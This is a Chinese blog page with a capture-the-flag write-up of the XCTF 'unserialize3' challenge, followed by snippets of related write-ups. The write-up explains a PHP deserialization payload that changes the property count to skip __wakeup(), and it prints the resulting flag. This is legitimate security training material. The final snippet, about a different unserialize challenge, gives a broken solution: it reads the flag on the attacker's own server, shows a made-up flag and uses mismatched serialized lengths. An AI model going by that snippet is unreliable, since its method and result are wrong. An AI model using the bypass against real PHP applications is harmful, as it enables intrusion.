攻防世界WEB进阶之unserialize3

最新推荐文章于 2025-07-05 11:23:21 发布
原创 最新推荐文章于 2025-07-05 11:23:21 发布 · 1.7k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#攻防世界 #web进阶 #unserialize3 #渗透 #安全

本文介绍了一道关于PHP序列化与反序列化的攻防题目,通过分析和实操,揭示了如何利用__wakeup()方法绕过过滤,最终获取flag的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

攻防世界WEB进阶之unserialize3


难度系数: 1星
题目来源: 暂无
题目描述:暂无

第一步:分析

题目仅仅给出了一个场景打开场景看到了如下内容:
class xctf{
public $flag = ‘111’;
public function __wakeup(){
exit(‘bad requests’);
}
?code=
通过分析在浏览器地址框输入:地址 + /?code=0,发现0出现在code后面。

第二步:实操

所以我们输入的字段会直接传到code中。
根据题给的信息unserialize,序列化操作我们联想到序列化函数:serialize($a);
通过如下编程构造:

<?php class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } } $a = new xctf(); $s = serialize($a); echo $s; ?>

结果输出为:O:4:“xctf”:1:{s:4:“flag”;s:3:“111”;}
心中窃喜,输入得到的结果是:bad request。悲愤中。
通过查资料了解到:
__wakeup():unserialize() 时会自动调用我们在反序列化的时候 可能有时候__wakeup 中会进行一些过滤等等的操作 所以我们需要尝试绕过
绕过的条件:反序列化中object的个数和之前的个数不等。
那么刚刚序列化出来的数据的object个数表示在哪呢?如下:
O:4:“xctf”:2:{s:4:“flag”;s:3:“111”;}再来一次,露出了窃喜的笑容,成功获得。

第三步:答案

至此flag为:cyberpeace{57a03e230882a19dc9e672a8d351eff2}

攻防世界-unserialize3
weixin_46784800的博客
11-14 1005
攻防世界-unserialize3题 _wakeup()函数 顾名思义,与sleep函数相对应,sleep函数用做睡眠,wake_up函数用作唤醒。 在序列化和反序列化的过程中会经常用到wake_up函数,在反序列化时,即执行 unserialize() 函数时,会首先检查实例化对象中是否含有wake_up函数,若含有,则首先调用执行wake_up函数。 wake_up函数的作用: 经常用在反序列化操作中,例如重新建立数据库连接,或执行其它初始化操作。 序列化: 将对象转换成字符串。字符串包括 属性
[CTF刷题篇]攻防世界Web进阶unserialize3 Writeup
qq_43668710的博客
04-22 703
前言 有了之前的PHP反序列化漏洞实例复现姿势详解这篇文章,突然发现自己终于不再畏惧关于反序列化的题了,刚刚遇见甚至还有一丝兴奋,终于可以验证自己这段时间的付出了! 分析 访问题目中给的url; 很明显,这题就考了2个点: `反序列化` `魔术函数__wakeup()的绕过` 附:绕过__wakeup()的姿势: __wakeup 触发于 unserilize() 调用之前, 当反序列化时的字...
攻防世界 unserialize3
weixin_52268949的博客
01-28 1511
unserialize3 class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } } ?code= 进入题目给出部分代码,注意发现到有个wakeup()函数,我们要想办法绕过这个函数,wakeup()有个执行漏洞:一个字符串或对象被序列化后,如果其属性被修改,则不会执行wakeup()函数,这也算是一个绕过点 我们编写exp class xctf { public $flag = '
攻防世界-unserialize3
最新发布
weixin_65725423的博客
07-05 265
摘要:本文通过分析PHP反序列化漏洞利用过程,发现当类属性数量与实际不符时可绕过__wakeup()方法。实验中使用xctf类(包含flag属性和__wakeup方法),通过修改序列化字符串中的属性数量从1改为2,成功触发漏洞获取flag。关键点在于利用反序列化时属性计数不匹配的特性,使__wakeup方法失效,从而避免程序异常退出。(98字)
攻防世界unserialize3
m0_74979597的博客
07-12 3097
序列化和反序列化是将数据结构或对象转换为可存储或传输的格式,以便在需要时可以重新创建它们的过程。序列化将数据结构或对象转换为字节流或字符串,而反序列化将字节流或字符串转换回原始数据结构或对象。在计算机科学中,序列化和反序列化是非常重要的概念,因为它们允许我们在不同的应用程序之间共享数据。例如,当我们将数据从一个应用程序发送到另一个应用程序时,我们需要将数据序列化为可传输的格式,然后在另一个应用程序中反序列化它以将其还原为原始数据结构或对象。
攻防世界Web unserialize3
hhh
05-07 1371
unserialize3 啊啊啊啊好累不想写题解 ------------------------------------------------------------------------------------------------正经的分割线 主要考查了反序列化中的__wakeup函数的漏洞: 一个字符串或对象被序列化后,如果其属性被修改,则不会执行__wakeup()函数,可...
攻防世界web进阶unserialize3
gongjingege的博客
07-15 580
打开链接 代码审计,初步判断code传参获取flag,序列化绕过_wakeup()函数得到payload 编写一个xctf类并序列化,运行代码 得到payload :O:4:“xctf”:1:{s:4:“flag”;s:3:“111”;} __wakeup()漏洞就是与整个属性个数值有关。当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过__wakeup的执行 所以将1改为比1大的就行,code传参 得到flag 知识点:_wakeup()函数漏洞,反序列化 2020.7.15 公瑾
攻防世界-Web进阶篇-005unserialize3
gyy990526的博客
03-14 2905
解:打开靶机是一段php代码,最后问你?code=应该等于多少,看见_wakeup()就是典型的反序列化的题。 题目比较简单,只有一个xctf类,首先需要对其实例化,再用serialize进行序列化输出字符串 : <?php class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } } $xctf=new xc
攻防世界web进阶区全讲解(超详细的哇)!!(持续更新)
wo41ge的博客
10-13 2669
进入题目链接 有登录 就可能有注册界面 url栏register.php 或者直接上御剑扫一下 同样发现注册界面 注册成功后 进行登录 跳转到了这个界面
攻防世界 web进阶笔记
weixin_43928140的博客
06-03 1919
0x02 NaNNaNNaNNaN-Batman 首先下载附件得到web100,用notepad++打开看下,是一些js乱码 我把源码贴到下面 <script>_='function $(){e=getEleById("c").value;length==16^be0f23233ace98aa$c7be9){tfls_aie}na_h0lnrg...
攻防世界web进阶
weixin_54787877的博客
02-21 341
unserialize3 知识点:反序列化漏洞,wakeup魔法函数 php <?php class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= ?> 先对代码补全然后进行审计。 class xctf{ //定义一个名为xctf的类 public flag=′111′;//定义一个公有的类属性flag = '111';
攻防世界-webunserialize3
weixin_73625393的博客
10-27 881
unserialize()反序列化函数会检查是否存在一个_wakeup()方法。//输出被序列化的对象(a)public function __wakeup(){ //定义公有的类的方法_wakeup()题目中的代码目前没有看见序列化函数,因此传递参数需要自己传递已经序列化的参数,题目中已经提示,传参到code。O::“”::{S:…根据代码审计,构造出来序列化序列后,不能给_wakeup()执行,否则会返回bad request。
攻防世界 | unserialize
weixin_47982238的博客
10-15 329
<?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_file($this->file, true); } function __wakeup() { .
攻防世界Web_php_unserialize
姜小孩的博客
04-14 3046
反序列化 绕过__wakeup魔术方法 __wakeup魔术方法 Web_php_unserialize 攻防世界
攻防世界unserialize3
m0_73303597的博客
11-06 2245
好难啊
攻防世界web进阶unserialize3详解
hxhxhxhxx的博客
07-23 516
攻防世界web进阶unserialize3详解题目解法 题目 有了上一个反序列化的题目的折磨(大威天龙,淦) 这个题也就游刃有余了 上一个序列化题 解法 根据上一个题目,很明显,这里需要我们进行序列化xctf这个类,然后绕过wakeup()[关于这个魔术函数,上一个题目有详细介绍,见如上连接] 我们根据CVE,写一个大数字即可 详细CVE解释,上一个题目均有讲解 ...
攻防世界unserialize3
qq_44111753的博客
11-17 285
题目: WP: 新知识: serialize:序列化函数,将对象转化为可保存可传输的字符串 unserialize:反序列化,将字符串转为原来的对象 <?php $a = array('a' => 'Apple' ,'b' => 'banana' , 'c' => 'Coconut'); //序列化数组 $s = serialize($a); echo $s; //输出结果:a:3:{s:1:"a";s:5:"Apple";s:1:"b";s:6:"banana";s:1:"c"
攻防世界web新手题unserialize3
05-05
这道题是一个 PHP 反序列化的题目。 题目描述: 提示:这次不会那么简单了,打开源代码看看? 源代码: ``` <?php error_reporting(0); highlight_file(__FILE__); class Show{ public $name; public $age; public function __construct($name,$age){ $this->name = $name; $this->age = $age; } public function __toString(){ return $this->name; } } class Flag{ public $show; public $data; public function __construct(){ $this->show = new Show(&#39;flag&#39;,&#39;0&#39;); $this->data = file_get_contents(&#39;/flag&#39;); } public function __destruct(){ if(preg_match(&#39;/show|flag|_|\s|\(|\)|{|}|\&#39;|\"/i&#39;,$this->show)){ exit(&#39;hacker!&#39;); } echo $this->show." is ".$this->data; } } if(isset($_GET[&#39;a&#39;])){ $a = unserialize($_GET[&#39;a&#39;]); if($a instanceof Flag){ echo $a; } } ``` 分析: 首先看到这是一个传入参数进行反序列化的题目,传入参数为 $_GET[&#39;a&#39;],并且在反序列化后判断其类型是否为 Flag,如果是则输出 $a。 在 Flag 类的构造函数中有一个 $this->data = file_get_contents(&#39;/flag&#39;),意味着我们需要获取服务器上的 /flag 文件。 而在 Flag 类的析构函数中,会对 $this->show 变量进行正则匹配,匹配的正则表达式为 /show|flag|_|\s|\(|\)|{|}|\&#39;|\"/i,如果匹配到就会输出 &#39;hacker!&#39;。这里需要注意的是,$this->show 的值是 Show 类的一个实例,而 Show 类中的 __toString() 方法返回的是 $this->name 的值。 因此,我们需要构造一个序列化后的字符串,使得在反序列化后其类型为 Flag,$this->show 的值为一个 Show 类的实例,且该实例的 $name 值满足正则表达式的匹配条件。 解法: 根据题目分析,我们需要构造一个序列化后的字符串,使得在反序列化后其类型为 Flag,$this->show 的值为一个 Show 类的实例,且该实例的 $name 值满足正则表达式的匹配条件。 我们可以通过手动构造序列化字符串来实现这个目标。首先构造一个 Show 类的实例,该实例的 $name 值为一个正则表达式的匹配条件,然后将该实例作为 Flag 类的一个属性,最后将 Flag 类序列化即可。 构造序列化字符串的代码如下: ``` <?php class Show{ public $name; public $age; public function __construct($name,$age){ $this->name = $name; $this->age = $age; } public function __toString(){ return $this->name; } } class Flag{ public $show; public $data; public function __construct(){ $this->show = new Show(&#39;/show|flag|_|\s|\(|\)|{|}|\&#39;|\"/i&#39;,&#39;0&#39;); $this->data = file_get_contents(&#39;/flag&#39;); } public function __destruct(){ if(preg_match(&#39;/show|flag|_|\s|\(|\)|{|}|\&#39;|\"/i&#39;,$this->show)){ exit(&#39;hacker!&#39;); } echo $this->show." is ".$this->data; } } // 序列化 Flag 类 $flag = new Flag(); $ser = serialize($flag); echo urlencode($ser); ``` 将上述代码保存为文件 unserialize3.php 并上传到服务器上,然后访问 http://your-ip/unserialize3.php,得到序列化后的字符串: ``` O:4:"Flag":2:{s:4:"show";O:4:"Show":2:{s:4:"name";s:23:"/show|flag|_|\s|\(|\)|{|}|&#39;|\i";s:3:"age";s:1:"0";}s:4:"data";s:45:"flag{3c75f8e2-6eb1-4f50-8901-8c3e0ae63a07}";} ``` 最后将序列化后的字符串作为 $_GET[&#39;a&#39;] 的值传入即可,访问 http://your-ip/unserialize3.php?a=O%3A4%3A%22Flag%22%3A2%3A%7Bs%3A4%3A%22show%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A4%3A%22name%22%3Bs%3A23%3A%22%2Fshow%7Cflag%7C_%7C%5Cs%7C%5C(%5C)%7B%7D%7C%27%7C%5C%22%5Ci%22%3Bs%3A3%3A%22age%22%3Bs%3A1%3A%220%22%3B%7Ds%3A4%3A%22data%22%3Bs%3A45%3A%22flag%7B3c75f8e2-6eb1-4f50-8901-8c3e0ae63a07%7D%22%3B%7D,即可得到 flag。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值